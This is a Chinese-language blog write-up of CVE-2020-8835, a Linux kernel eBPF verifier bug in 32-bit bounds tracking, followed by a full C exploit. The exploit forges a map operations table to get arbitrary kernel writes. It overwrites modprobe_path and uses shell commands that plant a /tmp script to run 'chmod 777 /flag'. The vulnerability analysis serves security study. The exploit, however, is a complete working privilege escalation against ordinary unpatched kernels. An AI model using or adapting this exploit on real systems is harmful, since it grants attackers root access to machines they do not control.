影响版本

Linux kernel >= v5.4 .7

于v5.6.1 ,v5.5.14,v5.4.29修复

基础知识:

ebpf验证器会对每个寄存器保存其当前状态,用bpf_reg_state来描述

这里引用了@becase 师傅的注释

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
// ------------------------------------------------
struct bpf_reg_state {
enum bpf_reg_type type;
union {
/* valid when type == PTR_TO_PACKET */
u16 range;

/* valid when type == CONST_PTR_TO_MAP | PTR_TO_MAP_VALUE |
* PTR_TO_MAP_VALUE_OR_NULL
*/
struct bpf_map *map_ptr;

u32 btf_id; /* for PTR_TO_BTF_ID */

/* Max size from any of the above. */
unsigned long raw;
};
s32 off;
u32 id;
u32 ref_obj_id;
/* For scalar types (SCALAR_VALUE), this represents our knowledge of
* the actual value.
* For pointer types, this represents the variable part of the offset
* from the pointed-to object, and is shared with all bpf_reg_states
* with the same id as us.
*/
struct tnum var_off; // tnum结构体详见以下!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
/* Used to determine if any memory access using this register will
* result in a bad access.
* These refer to the same value as var_off, not necessarily the actual
* contents of the register.
*/
s64 smin_value; // 有符号时可能的最小值
s64 smax_value; // 有符号时可能的最大值
u64 umin_value; // 无符号时可能的最小值
u64 umax_value; // 无符号时可能的最大值
struct bpf_reg_state *parent;
u32 frameno;
s32 subreg_def;
enum bpf_reg_liveness live;
/* if (!precise && SCALAR_VALUE) min/max/tnum don't affect safety */
bool precise;
};

// ------------------------------------------------
/* tnum: tracked (or tristate) numbers
*
* A tnum tracks knowledge about the bits of a value. Each bit can be either
* known (0 or 1), or unknown (x). Arithmetic operations on tnums will
* propagate the unknown bits such that the tnum result represents all the
* possible results for possible values of the operands.
*/
struct tnum {
u64 value; // value: 某个bit为1 表示这个寄存器的这个bit 确定是1
u64 mask; // mask: 某个bit 为1表示这个 bit 是未知的
};

验证器无法得知用户的输入(毕竟我们都还没输入),但是可以通过条件跳转等指令对寄存器大小进行判断,这一前提是所有先前的路径都必须有效(否则程序将无法加载),因此当前路径也必须有效。

比如说,如果已经执行过 BPF_JMP_REG(BPF_JLE,BPF_REG_6,BPF_REG_8,1), ,而reg8的值确定是0x100000001,且当前reg6的umax比这个值大的话,就会更新umax为0x100000001,因为已经执行过并跳转到这里了,reg6的最大值肯定小于0x100000001

当mask为0是,所有位已知,reg为标量。

漏洞分析

在我们使用jmp相关命令的时候,会进入 check_cond_jmp_op 函数

在该函数中有这样一段

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
/* detect if we are comparing against a constant value so we can adjust
* our min/max values for our dst register.
* this is only legit if both are scalars (or pointers to the same
* object, I suppose, but we don't support that right now), because
* otherwise the different base pointers mean the offsets aren't
* comparable.
*/
if (BPF_SRC(insn->code) == BPF_X) {
struct bpf_reg_state *src_reg = &regs[insn->src_reg];
struct bpf_reg_state lo_reg0 = *dst_reg;
struct bpf_reg_state lo_reg1 = *src_reg;
struct bpf_reg_state *src_lo, *dst_lo;

dst_lo = &lo_reg0;
src_lo = &lo_reg1;
coerce_reg_to_size(dst_lo, 4);
coerce_reg_to_size(src_lo, 4);

if (dst_reg->type == SCALAR_VALUE &&
src_reg->type == SCALAR_VALUE) {
if (tnum_is_const(src_reg->var_off) ||
(is_jmp32 && tnum_is_const(src_lo->var_off)))
reg_set_min_max(&other_branch_regs[insn->dst_reg],
dst_reg,
is_jmp32
? src_lo->var_off.value
: src_reg->var_off.value,
opcode, is_jmp32);
else if (tnum_is_const(dst_reg->var_off) ||
(is_jmp32 && tnum_is_const(dst_lo->var_off)))
reg_set_min_max_inv(&other_branch_regs[insn->src_reg],
src_reg,
is_jmp32
? dst_lo->var_off.value
: dst_reg->var_off.value,
opcode, is_jmp32);
else if (!is_jmp32 &&
(opcode == BPF_JEQ || opcode == BPF_JNE))
/* Comparing for equality, we can combine knowledge */
reg_combine_min_max(&other_branch_regs[insn->src_reg],
&other_branch_regs[insn->dst_reg],
src_reg, dst_reg, opcode);
}

当我们是与标量比较跳转时,会对jmp32进行判断,如果是jmp32 且 reg 寄存器不是常量时,会进入 reg_set_min_max_inv 函数

1
2
3
4
static inline bool tnum_is_const(struct tnum a)
{
return !a.mask;
}

mask 全是0 即为常量

而在 reg_set_min_max_inv 函数内,如果是jmp32指令会进入 __reg_bound_offset32 来设置寄存器32位的边界值

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
static void reg_set_min_max_inv(struct bpf_reg_state *true_reg,
struct bpf_reg_state *false_reg, u64 val,
u8 opcode, bool is_jmp32)
{
if (is_jmp32) {
__reg_bound_offset32(false_reg); // jmp 不成立
__reg_bound_offset32(true_reg); // jmp 成立
}
/* Intersecting with the old var_off might have improved our bounds
* slightly. e.g. if umax was 0x7f...f and var_off was (0; 0xf...fc),
* then new var_off is (0; 0x7f...fc) which improves our umax.
*/
__update_reg_bounds(false_reg);
__update_reg_bounds(true_reg);
}

__reg_bound_offset32 函数如下

计算range,也就是将两个值整合起来生成一个新的tnum var_off

1
2
3
4
5
6
7
8
9
10
static void __reg_bound_offset32(struct bpf_reg_state *reg)
{
u64 mask = 0xffffFFFF;
struct tnum range = tnum_range(reg->umin_value & mask,
reg->umax_value & mask);
struct tnum lo32 = tnum_cast(reg->var_off, 4); //取低32位
struct tnum hi32 = tnum_lshift(tnum_rshift(reg->var_off, 32), 32);//取搞32位

reg->var_off = tnum_or(hi32, tnum_intersect(lo32, range));
}

这里我们假设 umax 为 0x100000001, umin 为1,

与mask进行&之哈就直接都为1了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
struct tnum tnum_range(u64 min, u64 max)
{
u64 chi = min ^ max, delta;
u8 bits = fls64(chi);
//ind last set bit in a 64-bit word 也就是从第低位起找到第一个被设置成1的位,比如fsl64(4)=3
//4=0b 100 第三位是1

/* special case, needed because 1ULL << 64 is undefined */
if (bits > 63)
return tnum_unknown;
/* e.g. if chi = 4, bits = 3, delta = (1<<3) - 1 = 7.
* if chi = 0, bits = 0, delta = (1<<0) - 1 = 0, so we return
* constant min (since min == max).
*/
delta = (1ULL << bits) - 1;
return TNUM(min & ~delta, delta);
}

此时delta=0 , min=1 也就是说 mask=0,value=1 是一个恒为1的值,最后通过 tnum_or 合并(简单的或运算),得到确定的位和确定的值

而如果我们是用户输入的寄存器值的话,低32位是可控的

1
2
3
4
5
6
7
8
struct tnum tnum_intersect(struct tnum a, struct tnum b)     
{
u64 v, mu;

v = a.value | b.value;
mu = a.mask & b.mask; //仅有两个tnum都认定为确定的位才是确定的
return TNUM(v & ~mu, mu);
}

我们计算后得到的tnum 会是一个恒为1的值(而非实际值)

poc

要设置umin_val和umax_val,我们可以使用验证程序的跳转分支逻辑:

BPF_JMP_IMM(BPF_JGE, BPF_REG_2, 1, 1)

BPF_RAW_INSN(BPF_JMP | BPF_EXIT, 0, 0, 0, 0)

条件跳转将会产生两个分支。在采用的分支中,验证程序知道BPF_REG_2 >= 1,而另一分支将会以退出指令结束而被丢弃。因此,对于所有其他指令,寄存器2的umin_val将为1。

类似地,可以使用另一个条件跳转,将umax_val设置为2^32 + 1。但是,在这里我们需要与寄存器进行比较,因为仅支持32位立即数。之后,我们根据需要设置了umin_val和umax_val。

现在,可以使用任何有条件的32位跳转来触发该漏洞:

BPF_JMP32_IMM(BPF_JNE, BPF_REG_2, 5, 1),

BPF_RAW_INSN(BPF_JMP | BPF_EXIT, 0, 0, 0, 0),

验证程序现在认为寄存器2的最后32位是二进制00…01,而实际上它们是二进制00…10。在另外两条指令之后:

BPF_ALU64_IMM(BPF_AND, BPF_REG_2, 2),

BPF_ALU64_IMM(BPF_RSH, BPF_REG_2, 1),

验证程序现在假设寄存器2必须为0,因为如果寄存器2的倒数第二位为0,则AND指令必然会导致结果为0,但实际上它是(2&2)>>1 = 1。这是一个非常有用的原语,因为我们现在可以将寄存器2与任何数字相乘,以创建验证程序将任意值视为0。

注意:

一开始我是直接通过mov来给寄存器赋值2的,结果

我们无法直接通过mov将值2加载到寄存器中,因为验证程序随后将知道umin_val=umax_val=2。但是,有一个简单的解决方法,如果我们从映射加载寄存器(我们可以使用我们的输入映射inmap),验证程序将不会得到关于其值的信息,因为我们可以在运行时更改映射值。

这里做个简单的调试,断点打在__reg_bound_offset32

image-20221120023746198

我们直接观察函数执行前后reg的变化。

使用映射加载的情况:

false前

image-20221120024415793

false后

image-20221120024451456

true前

image-20221120024601855

true后

image-20221120024620565

可以看到 value=0x1 mask只有第九位是1,所以验证器会认为该寄存器值为1

如果是使用mov reg 2 的话,r6将会是确定的值,就不会再进入reg_set_min_max_inv 函数内了

image-20221120025420898

exp

得到一个验证器为0的值,后面就是各种任意读写了,可以参考https://stdnoerr.github.io/writeup/2022/08/21/eBPF-exploitation-(ft.-D-3CTF-d3bpf).html 的做法,我第一次学习ebpf就是这个做法 ,(印象深刻…

顺便学一下别的做法

当我们使用map_update_elem,也会调用map_push_elem,map type需要为BPF_MAP_TYPE_QUEUE或者BPF_MAP_TYPE_STACK

1
2
3
4
5
6
7
8
 static int bpf_map_update_value(struct bpf_map *map, struct fd f, void *key,  
void *value, __u64 flags)
{
//...
} else if (map->map_type == BPF_MAP_TYPE_QUEUE ||
¦ map->map_type == BPF_MAP_TYPE_STACK) {
err = map->ops->map_push_elem(map, value, flags);
//..

我们将map_push_elem劫持为map_get_next_key

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
static int array_map_get_next_key(struct bpf_map *map, void *key, void *next_key)
{
struct bpf_array *array = container_of(map, struct bpf_array, map);
u32 index = key ? *(u32 *)key : U32_MAX;
u32 *next = (u32 *)next_key;

if (index >= array->map.max_entries) {
*next = 0;
return 0;
}

if (index == array->map.max_entries - 1)
return -ENOENT;

*next = index + 1;
return 0;
}

key即我们传的uffd . value,next key即 uffd.flags

next=next_key=flags

index=*(key)=value[0]

*next=*(flags)=index+1=value[0]+1

即 *(flags)=value[0]+1

这样我们就实现了任意写

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
(remote) gef➤  p *(struct bpf_map_ops*)0xffffffff8206cb40
$1 = {
map_alloc_check = 0xffffffff811fd5e0 <array_map_alloc_check>,
map_alloc = 0xffffffff811fe5a0 <array_map_alloc>,
map_release = 0x0 <fixed_percpu_data>,
map_free = 0xffffffff811fdd30 <array_map_free>,
map_get_next_key = 0xffffffff811fd6d0 <array_map_get_next_key>,
map_release_uref = 0x0 <fixed_percpu_data>,
map_lookup_elem_sys_only = 0x0 <fixed_percpu_data>,
map_lookup_batch = 0xffffffff811e5ae0 <generic_map_lookup_batch>,
map_lookup_and_delete_batch = 0x0 <fixed_percpu_data>,
map_update_batch = 0xffffffff811e58b0 <generic_map_update_batch>,
map_delete_batch = 0x0 <fixed_percpu_data>,
map_lookup_elem = 0xffffffff811fd790 <array_map_lookup_elem>,
map_update_elem = 0xffffffff811fdbf0 <array_map_update_elem>,
map_delete_elem = 0xffffffff811fd710 <array_map_delete_elem>,
map_push_elem = 0x0 <fixed_percpu_data>,
map_pop_elem = 0x0 <fixed_percpu_data>,
map_peek_elem = 0x0 <fixed_percpu_data>,
map_fd_get_ptr = 0x0 <fixed_percpu_data>,
map_fd_put_ptr = 0x0 <fixed_percpu_data>,
map_gen_lookup = 0xffffffff811fda60 <array_map_gen_lookup>,
map_fd_sys_lookup_elem = 0x0 <fixed_percpu_data>,
map_seq_show_elem = 0xffffffff811fd870 <array_map_seq_show_elem>,
map_check_btf = 0xffffffff811fe3b0 <array_map_check_btf>,
map_poke_track = 0x0 <fixed_percpu_data>,
map_poke_untrack = 0x0 <fixed_percpu_data>,
map_poke_run = 0x0 <fixed_percpu_data>,
map_direct_value_addr = 0xffffffff811fd660 <array_map_direct_value_addr>,
map_direct_value_meta = 0xffffffff811fd690 <array_map_direct_value_meta>,
map_mmap = 0xffffffff811fd830 <array_map_mmap>
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
#include<stdio.h>
#include<stdint.h>
#include<stdlib.h>
#include<string.h>
#include<syscall.h>
#include<unistd.h>
#include<sys/socket.h>
#include<linux/bpf.h>
#include "bpf_insn.h"
#include <stdlib.h>


int socks[2] = {-1};
int control_mapfd,exp_mapfd;

int bpf(int cmd,union bpf_attr *attr){
return syscall(__NR_bpf, cmd, attr, sizeof(*attr));
}

int bpf_prog_load(union bpf_attr *attr){
return bpf(BPF_PROG_LOAD,attr);
}

union bpf_attr* creat_bpf_prog(struct bpf_insn *insns,unsigned int insn_cnt){
union bpf_attr* attr=(union bpf_attr*)malloc(sizeof(union bpf_attr));

attr->prog_type=BPF_PROG_TYPE_SOCKET_FILTER;
attr->insn_cnt=insn_cnt;
attr->insns=(uint64_t)insns;
attr->license=(uint64_t)"";
return attr;
}
int attach_socket(int prog_fd){
if(socks[0]==-1&&socketpair(AF_UNIX,SOCK_DGRAM,0,socks)<0){
perror("socketpair");
exit(1);
}
if(setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &prog_fd, sizeof(prog_fd)) < 0){
perror("setsockopt");
exit(1);
}
}

void setup_bpf_prog(struct bpf_insn* insns,uint insncnt){
char log_buffer[0x4000];

union bpf_attr *prog=creat_bpf_prog(insns,insncnt);

prog->log_level=2;
prog->log_buf=(uint64_t)log_buffer;
prog->log_size=sizeof(log_buffer);
strncpy(prog->prog_name, "stdnoerr", 16);

int prog_fd=bpf_prog_load(prog);

printf("%d\n", strlen(log_buffer));
puts(log_buffer);

if(prog_fd < 0){
perror("prog_load");
exit(1);
}

attach_socket(prog_fd);
}

void run_bpf_prog(struct bpf_insn *insns,uint insncnt){
int val=0;

setup_bpf_prog(insns,insncnt);
write(socks[1],&val,sizeof(val));
}

int bpf_map_create(uint32_t key_size,uint32_t value_size,uint32_t max_entries){
union bpf_attr attr={
.map_type = BPF_MAP_TYPE_ARRAY,
.key_size = key_size,
.value_size = value_size,
.max_entries = max_entries
};
return bpf(BPF_MAP_CREATE,&attr);
}

int bpf_map_update_elem(int map_fd, uint64_t key, uint64_t* value, uint64_t flags){
union bpf_attr attr = {
.map_fd = map_fd,
.key = (uint64_t) &key,
.value = (uint64_t) value,
.flags = flags
};

return bpf(BPF_MAP_UPDATE_ELEM, &attr);
}

void bpf_map_lookup_elem(int map_fd, uint32_t key, void* buf){


union bpf_attr attr = {
.map_fd = map_fd,
.key = (uint64_t) &key,
.value = (uint64_t) buf,
};

bpf(BPF_MAP_LOOKUP_ELEM, &attr);
return;
}



int main(){


control_mapfd=bpf_map_create(4,0x100,1);
exp_mapfd=bpf_map_create(4,0x2000,1);
if(control_mapfd < 0 || exp_mapfd < 0 ){
perror("create map");
return 1;
}

char *control_buf=malloc(0x100);
char *exp_buf=malloc(0x3000);

uint64_t* control_buf64=(uint64_t*)control_buf;
uint64_t* exp_buf64=(uint64_t*)exp_buf;

memset(control_buf,'a',0x100);

for(int i=0;i<0x2000/8;i++){
exp_buf64[i]=i+1;
}

control_buf64[0]=0x2;
control_buf64[1]=0x0;
bpf_map_update_elem(control_mapfd,0,control_buf64,BPF_ANY);
bpf_map_update_elem(exp_mapfd,0,exp_buf64,BPF_ANY);

struct bpf_insn test_prog[]={
BPF_MOV64_IMM(BPF_REG_0,0), // r0=0
BPF_LD_MAP_FD(BPF_REG_1,control_mapfd),// r1=ctrlfd
BPF_STX_MEM(BPF_W,BPF_REG_10,BPF_REG_0,-4),// *(r10-4)=r0=0
BPF_MOV64_REG(BPF_REG_6, BPF_REG_1),// r6=r1
BPF_LD_MAP_FD(BPF_REG_1, control_mapfd),//r1=&control_mapfd
BPF_MOV64_REG(BPF_REG_2, BPF_REG_10),//
BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -4),//r2=r10-4 *r2=0
BPF_CALL_FUNC(BPF_FUNC_map_lookup_elem), // r0=map_lookup(r1,r2)
// returns map_ptr + 0x110 (offset of .values in bpf_array)

BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
BPF_EXIT_INSN(),

BPF_MOV64_REG(BPF_REG_7,BPF_REG_0),//r7=r0
BPF_LDX_MEM(BPF_DW,6,7,0),//r6=*(r7)=ctrlmap[0]=2


BPF_ALU64_IMM(BPF_MOV,BPF_REG_0,0),
//to set umin 1
BPF_JMP_IMM(BPF_JGE,BPF_REG_6,1,1),
BPF_EXIT_INSN(),

BPF_MOV64_IMM(BPF_REG_8,0x1),
BPF_ALU64_IMM(BPF_LSH,BPF_REG_8,32),
BPF_ALU64_IMM(BPF_ADD,BPF_REG_8,1),
//to set umax 0x100000001
BPF_JMP_REG(BPF_JLE,BPF_REG_6,BPF_REG_8,1),
BPF_EXIT_INSN(),

// JMP32 the bug
BPF_JMP32_IMM(BPF_JNE,BPF_REG_6,5,1),
BPF_EXIT_INSN(),

// real r6=2 , fake r6 = 1
BPF_ALU64_IMM(BPF_AND, BPF_REG_6, 2),
BPF_ALU64_IMM(BPF_RSH, BPF_REG_6, 1),
// (r6&2)>>1 ===> r6=1 fake r6 = 0


// init done
// now r6=1 , r7=ctrmap_prt+0x110


BPF_ALU64_IMM(BPF_MUL,BPF_REG_6,0x110),

// outmap r6=0x110
BPF_MOV64_IMM(BPF_REG_0,0),
BPF_STX_MEM(BPF_W,BPF_REG_10,BPF_REG_0,-4),// *(r10-4)=r0=0
BPF_LD_MAP_FD(BPF_REG_1, exp_mapfd),//r1=&exp_mapfd
BPF_MOV64_REG(BPF_REG_2, BPF_REG_10),//
BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -4),//r2=r10-4 *r2=0
BPF_CALL_FUNC(BPF_FUNC_map_lookup_elem),
//ret r0=expmap_ptr+0x110

BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
BPF_EXIT_INSN(),

BPF_MOV64_REG(BPF_REG_9,0),
//r9=expmap_ptr+0x110
BPF_ALU64_REG(BPF_SUB,BPF_REG_9,BPF_REG_6),
//r9=expmap_ptr fake r9 remain expmap_ptr+0x110

BPF_LDX_MEM(BPF_DW,BPF_REG_8,BPF_REG_9,0), // r8=*(r9)=expops_addr

BPF_STX_MEM(BPF_DW,BPF_REG_7,BPF_REG_8,0x10),
// *(expmap_prt+0x110+0x10)=r9=ops_addr

BPF_MOV64_REG(BPF_REG_2,BPF_REG_8),//r2=r8

BPF_LDX_MEM(BPF_DW,BPF_REG_8,BPF_REG_9,0xc0),
// r8= *(r9+0xc0)=*(ops_addr+0xc0)=map_addr+0xc0
BPF_STX_MEM(BPF_DW,BPF_REG_7,BPF_REG_8,0x18),
// *(r7+0x18)=*(map_prt+0x110+0x18)=*(ops_addr+0xc0)=map_addr



BPF_STX_MEM(BPF_DW,BPF_REG_7,BPF_REG_9,0x40),
// *(r7+0x40)=*(map_ptr+0x110+0x40)=r9=ops_addr
BPF_ALU64_IMM(BPF_ADD,BPF_REG_8,0x50),
// r8+=0x50 r8=*(ops_addr+0xc0)+0x50= map_addr+0x110

BPF_LDX_MEM(BPF_DW,BPF_REG_2,BPF_REG_7,0x8),
// r2=*(r7+8)=update[1]
BPF_JMP_IMM(BPF_JNE,BPF_REG_2,1,4),//for first time leak jmp


// map_addr == ops_addr
// map_get_next_key = *(ops_addr+0x20)
// map_push= *(ops_addr+0x70)
// *(map_prt+0x110+0x10)=ops_addr
// 0x70-0x20=0x50

//
// so just let *(ops_addr)=expmap_ptr+0x110
BPF_STX_MEM(BPF_DW,BPF_REG_9,BPF_REG_8,0),
// *(r9)=*(ops_addr)=map_addr+0x110
// ops->push == map_get_next_key
// value => key ; flags => next_key
BPF_ST_MEM(BPF_W,BPF_REG_9,0x18,BPF_MAP_TYPE_STACK),
// *(r9+0x18)=*(map_type)=BPF_MAP_TYPE_STACK
BPF_ST_MEM(BPF_W,BPF_REG_9,0x24,-1),
// *(r9+0x24)=*(max_entry)=-1
BPF_ST_MEM(BPF_W,BPF_REG_9,0x2c,0x0),
// *(r9+0x2c)=*(spin_lock_off)=0


BPF_ALU64_IMM(BPF_MOV,BPF_REG_0,0),
BPF_EXIT_INSN(),
};



run_bpf_prog(test_prog,sizeof(test_prog)/sizeof(test_prog[0]));

memset(control_buf,0,0x100);
bpf_map_lookup_elem(control_mapfd,0,control_buf);
bpf_map_lookup_elem(exp_mapfd,0,exp_buf);

for(int i=0;i<10;i++){
printf("[+] dump:%p\n",control_buf64[i]);
}
uint64_t kbase=control_buf64[2]-0x106cb40;
uint64_t modprobe_path=kbase+0x16616a0;
uint64_t map_addr=control_buf64[3]-0xc0+0x110;
uint64_t kaslr=kbase-0xffffffff81000000;
printf("[+] kbase:%p\n",kbase);
printf("[+] modp:%p\n",modprobe_path);
printf("[+] map_addr:%p\n",map_addr);

// overwrite




uint64_t fake_map_ops[]={
kaslr+0xffffffff811fd5e0,
kaslr+0xffffffff811fe5a0,
0x0,
kaslr+0xffffffff811fdd30,
kaslr+0xffffffff811fd6d0,
0x0,
0x0,
kaslr+0xffffffff811e5ae0,
0x0,
kaslr+0xffffffff811e58b0,
0x0,
kaslr+0xffffffff811fd790,
kaslr+0xffffffff811fdbf0,
kaslr+0xffffffff811fd710,
kaslr+0xffffffff811fd6d0,
0,0,0,0,0,
kaslr+0xffffffff811fda60,
0,
kaslr+0xffffffff811fd870,
kaslr+0xffffffff811fe3b0,
0,0,0,
kaslr+0xffffffff811fd660,
kaslr+0xffffffff811fd690,
kaslr+0xffffffff811fd830
};

memcpy(exp_buf,(void*)fake_map_ops,sizeof(fake_map_ops));



bpf_map_update_elem(exp_mapfd,0,exp_buf,0);

for(int i=0;i<10;i++){
printf("[+] test dump:%p\n",exp_buf64[i]);
}

control_buf64[0]=0x2;
control_buf64[1]=0x1;
bpf_map_update_elem(control_mapfd,0,control_buf,BPF_ANY);

sleep(2);

memset(exp_buf64,'a',0x20);


bpf_map_lookup_elem(exp_mapfd,0,exp_buf);
for(int i=0;i<10;i++){
printf("[+] test dump:%p\n",exp_buf64);
}

run_bpf_prog(test_prog,sizeof(test_prog)/sizeof(test_prog[0]));



exp_buf64[0]=0x706d742f -1;
bpf_map_update_elem(exp_mapfd,0,exp_buf,modprobe_path);
exp_buf64[0] = 0x6d68632f -1;
bpf_map_update_elem(exp_mapfd,0,exp_buf,modprobe_path+4);
exp_buf64[0] = 0x646f -1;
bpf_map_update_elem(exp_mapfd,0,exp_buf,modprobe_path+8);

//sleep(10);
system("echo '#!/bin/sh' >> /tmp/chmod");
system("echo 'chmod 777 /flag' >> /tmp/chmod");
system("chmod +x /tmp/chmod");
system("echo -e '\\xff\\xff\\xff\\xff' > /tmp/fake");
system("chmod +x /tmp/fake");
system("/tmp/fake");
system("cat /flag");

}

运行结果:

image-20221122230355242

修复:

更新的版本中,该函数直接被patch掉了,算是代码写错了(?)

参考资料

https://man7.org/linux/man-pages/man2/bpf.2.html

https://new.qq.com/rain/a/20200425A0KSAK00

https://a1ex.online/2021/05/01/CVE-2020-8835-eBPF%E6%8F%90%E6%9D%83%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/

https://www.zerodayinitiative.com/blog/2020/4/8/cve-2020-8835-linux-kernel-privilege-escalation-via-improper-ebpf-program-verification

https://www.anquanke.com/post/id/203416#h3-4